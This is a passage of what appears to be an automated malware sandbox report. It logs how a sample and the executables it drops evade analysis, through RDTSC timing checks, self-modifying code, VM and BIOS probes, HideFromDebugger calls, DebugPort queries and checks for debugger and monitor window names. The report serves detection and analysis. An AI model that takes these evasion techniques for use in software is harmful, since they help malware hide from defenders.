Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE18 second address: 34EE5F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jg 00007F856106A870h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F856106A864h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE5F second address: 34EE8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F856102FBE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F856102FBEEh 0x00000014 jg 00007F856102FBE8h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE8D second address: 34EE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EF69 second address: 34EF74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F856102FBE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EF74 second address: 34EFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F856106A85Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ecx 0x00000013 jnp 00007F856106A85Ch 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F856106A85Fh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EFB6 second address: 34EFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3525C5 second address: 3525F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F856106A865h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F856106A860h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3525F3 second address: 352634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF4h 0x00000009 jc 00007F856102FBE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F856102FC0Bh 0x00000018 pushad 0x00000019 jmp 00007F856102FBF7h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352634 second address: 35263A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527A2 second address: 3527AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527AC second address: 3527B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527B2 second address: 3527DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 ja 00007F856102FBE6h 0x0000000e ja 00007F856102FBE6h 0x00000014 jg 00007F856102FBE6h 0x0000001a popad 0x0000001b jp 00007F856102FBECh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527DC second address: 3527EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F856106A856h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352EBF second address: 352ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F856102FBE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352ECF second address: 352ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352ED5 second address: 352EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F856102FBE6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 20EA34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 20E97C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3B5F0C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3B4DC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3DFE9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 20E956 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 444CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Special instruction interceptor: First address: 3DE621 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Special instruction interceptor: First address: 4CE91D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Special instruction interceptor: First address: 66B497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Special instruction interceptor: First address: 669D25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4DE91D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 67B497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 679D25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 34EA34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 34E97C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 4F5F0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 4F4DC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 51FE9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 34E956 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 584CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Special instruction interceptor: First address: 57FC95 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Special instruction interceptor: First address: 3DDC53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Special instruction interceptor: First address: 600F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Special instruction interceptor: First address: 8E91D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Special instruction interceptor: First address: E2E621 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Special instruction interceptor: First address: 22B497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Special instruction interceptor: First address: 229D25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: 5330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: 55F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: 5330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Memory allocated: 5470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Memory allocated: 5650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Memory allocated: 54C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_003265B9 rdtsc 2_2_003265B9
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_0033858A sidt fword ptr [esp-02h] 2_2_0033858A
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 361
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 678
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 8083
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1317
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1081
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1029
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1042
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Window / User API: threadDelayed 406
Source: C:\Users\user\Desktop\file.exe TID: 7608 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7608 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe TID: 8008 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5660 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5660 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep count: 361 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep time: -10830000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052 Thread sleep count: 51 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052 Thread sleep time: -102051s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7824 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep count: 678 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep time: -1356678s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7744 Thread sleep count: 51 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7744 Thread sleep time: -102051s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep count: 8083 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep time: -16174083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7540 Thread sleep count: 1317 > 30
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7540 Thread sleep time: -2635317s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7544 Thread sleep count: 1081 > 30
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7544 Thread sleep time: -2163081s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7500 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7548 Thread sleep count: 1029 > 30
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7548 Thread sleep time: -2059029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7560 Thread sleep count: 1042 > 30
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7560 Thread sleep time: -2085042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 8152 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 5260 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe TID: 3444 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Publishers
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\SolidDocuments
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\CEF
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: skotes.exe, skotes.exe, 00000007.00000002.1951021674.000000000065E000.00000040.00000001.01000000.0000000C.sdmp, 1171a5b648.exe, 0000000A.00000002.2530987485.0000000000561000.00000040.00000001.01000000.0000000F.sdmp, 1171a5b648.exe, 0000001F.00000002.2686101939.0000000000561000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIo
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareA
Source: num.exe, 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware]
Source: firefox.exe, 0000001E.00000002.2722821711.0000015475E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: firefox.exe, 0000001B.00000002.2734125620.000001C1667E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp*
Source: firefox.exe, 00000020.00000002.2728564552.000002B797690000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557705533.0000000000732000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001C.00000002.2611179744.000000000165D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2722821711.0000015475E5A000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2720880731.000002B796EAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001B.00000002.2734125620.000001C16681A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0dA`
Source: firefox.exe, 0000001B.00000002.2736994657.000001C1704A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2728330869.0000015476212000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: num.exe, 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx4f
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999671750.000000000032E000.00000040.00000001.01000000.00000006.sdmp, EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe, 00000003.00000002.1919530236.000000000064E000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 00000004.00000002.1947813120.000000000065E000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 00000007.00000002.1951021674.000000000065E000.00000040.00000001.01000000.0000000C.sdmp, 1171a5b648.exe, 0000000A.00000002.2530987485.0000000000561000.00000040.00000001.01000000.0000000F.sdmp, 1171a5b648.exe, 0000001F.00000002.2686101939.0000000000561000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2730011672.0000015476640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000020.00000002.2728564552.000002B797690000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
